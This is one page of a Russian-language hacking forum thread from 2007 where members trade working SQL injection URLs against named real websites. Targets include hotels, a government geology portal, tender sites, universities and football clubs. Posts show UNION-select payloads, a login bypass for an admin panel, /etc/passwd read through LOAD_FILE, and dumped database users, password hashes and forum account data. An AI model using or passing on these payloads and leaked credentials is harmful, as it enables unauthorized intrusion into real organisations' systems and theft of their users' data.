HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 336 из 1604 « Первая < 236286326 332 333 334 335 336 337 338 339 340 3463864368361336 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #3351  
Старый 20.10.2007, 00:30
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами: 9780227

Репутация: 1423
По умолчанию
http://www.infohotel.ru/hotel.php?district=0&subway=0&room=0&price=0&searc h=2&page=0&id=-1+union+select+1,2,3,concat(version(),0x2F,databas e(),0x2F,user())/*

5.0.27/petroholru_info/petroholru@81.177.16.81 доступ к information_schema есть. ничего толкового не нашел


http://sovetnik-n.spb.ru/shownews.php?id=-1+union+select+1,2,3,concat(version(),0x2F,databas e(),0x2F,user()),5,6,7,8,9,10/*

4.1.20/sovetnik_n/sovetnik_n@localhost
 
Ответить с цитированием

  #3352  
Старый 20.10.2007, 09:15
Elvis000
Постоянный
Регистрация: 23.04.2007
Сообщений: 646
С нами: 10027046

Репутация: 1035


По умолчанию
Всероссийский туроператор свадебных путешествий

Код:
http://www.pssp.ru/services.php?s=999999999999+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(DATABASE(),0x71),0x71),4,5,6,7,8,9,10,11,12,13,14,15,16/*
юзер:dbu_galeeva_1@192.168.3.74
база:db_galeeva_1
версия:4.1.18
 
Ответить с цитированием

  #3353  
Старый 20.10.2007, 10:17
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
С нами: 10214321

Репутация: 552
По умолчанию
Код:
http://geolog.mnr.gov.ru/part/?pid=-1/**/union/**/select/**/1,LOAD_FILE('/etc/passwd'),3/*
 
Ответить с цитированием

  #3354  
Старый 20.10.2007, 10:45
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
С нами: 9798146

Репутация: 1224


По умолчанию
Код:
http://gostorgi.ru/z/tenders.php?tt=9999&rc='+union+select+1,2,user,password+from+mysql.user/*
1. root — 72f840f85cf3bb40
2. gostorgi — 72f840f85cf3bb40
 
Ответить с цитированием

  #3355  
Старый 20.10.2007, 12:34
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
С нами: 10172486

Репутация: 874
По умолчанию
2 ElteRUS
По поводу http://www.infohotel.ru
Тут есть более серьезная иньекция. http://www.infohotel.ru/admin/ в поле логин пишем 1' or 1=1/* в поле пароль любое. Мы в админке...

Цитата:
доступ к information_schema есть. ничего толкового не нашел
Незнаю как ты но я нашел таблицу spb_users, в ней поля username, password, там значения
username-admin
password-3fe4220069643d6d
Сильно подозреваю что это для входа в админку
Но ввиду 1' or 1=1/* становиться неактуальным, тем более что хеш я не расшифровал.
 
Ответить с цитированием

  #3356  
Старый 20.10.2007, 17:06
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами: 10516826

Репутация: 3742


По умолчанию
http://www.fnews.ru/archive.php?s=news&id=-1+union+select+1,2,3,4,concat(username,char(64),us er_password,0x25,user_email),6,7,8,9,10,11,12+from +phpbb_users+limit+1,1/*
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием

  #3357  
Старый 20.10.2007, 18:43
mister
Познающий
Регистрация: 24.07.2007
Сообщений: 31
С нами: 9895235

Репутация: 35
По умолчанию
Код:
http://www.bsu.edu.ru/utils/download.asp?idf=1+and+1=@@version--
 
Ответить с цитированием

  #3358  
Старый 20.10.2007, 19:27
Nea7
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
С нами: 9828237

Репутация: 778
По умолчанию
Код:
http://www.adamproject.net/dispositif.php?id_j=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7/*
adam@localhost:5.0.32-Debian_7etch1-log:adam
Код:
http://lesminots.com/resume0304.php?id_j=-1+union+select+concat(user(),0x3a,version(),0x3a,database()),2/*
ocblklesmin@10.0.64.33:5.0.26-log:ocblklesmin
Код:
http://www.bonus33.pl/oferta.php?id_z=-1+union+select+1,2,3,4,5,concat(user(),0x3a,version(),0x3a,database())/*
poczta_bonus@localhost:5.0.33-log:poczta_bonus
Код:
http://www.tswisla.pl/wislamcarthur/inc/zawodnik.php?id_z=-1+union+select+1,2,aes_decrypt(aes_encrypt(version(),0x71),0x71),4,5,6,7,8,9,10/*
5.0.24-Debian_0.dotdeb.0-log
 
Ответить с цитированием

edu
  #3359  
Старый 20.10.2007, 21:03
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
С нами: 10153766

Репутация: 2565
По умолчанию edu
MySQL 4.x.x.

Код:
http://spacegrant.nmsu.edu/isps/page.php?num=-6'+union+select+1,2,user(),4,5/*
MySQL 3.x.x.

Код:
http://www.auburn.edu/oit/oitnews/article.php?num=57+/*!40000+and+0+*/
Последний раз редактировалось [53x]Shadow; 21.10.2007 в 15:08.. Причина: очепятка =\
 
Ответить с цитированием

  #3360  
Старый 21.10.2007, 01:27
-MoLoToK-
Познающий
Регистрация: 04.10.2007
Сообщений: 32
С нами: 9791439

Репутация: 88
По умолчанию
ФК Химки
Код:
http://fckhimki.ru/modules/news/index.php?current_id=999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
fckhimki_new1@v2.valuehost.ru
Версия 4.0.27-max-log

ФК Торпедо
Код:
http://www.torpedo.ru/gb/comments.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from+news/*
Последний раз редактировалось -MoLoToK-; 21.10.2007 в 02:09..
 
Ответить с цитированием
Ответ
Страница 336 из 1604 « Первая < 236286326 332 333 334 335 336 337 338 339 340 3463864368361336 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.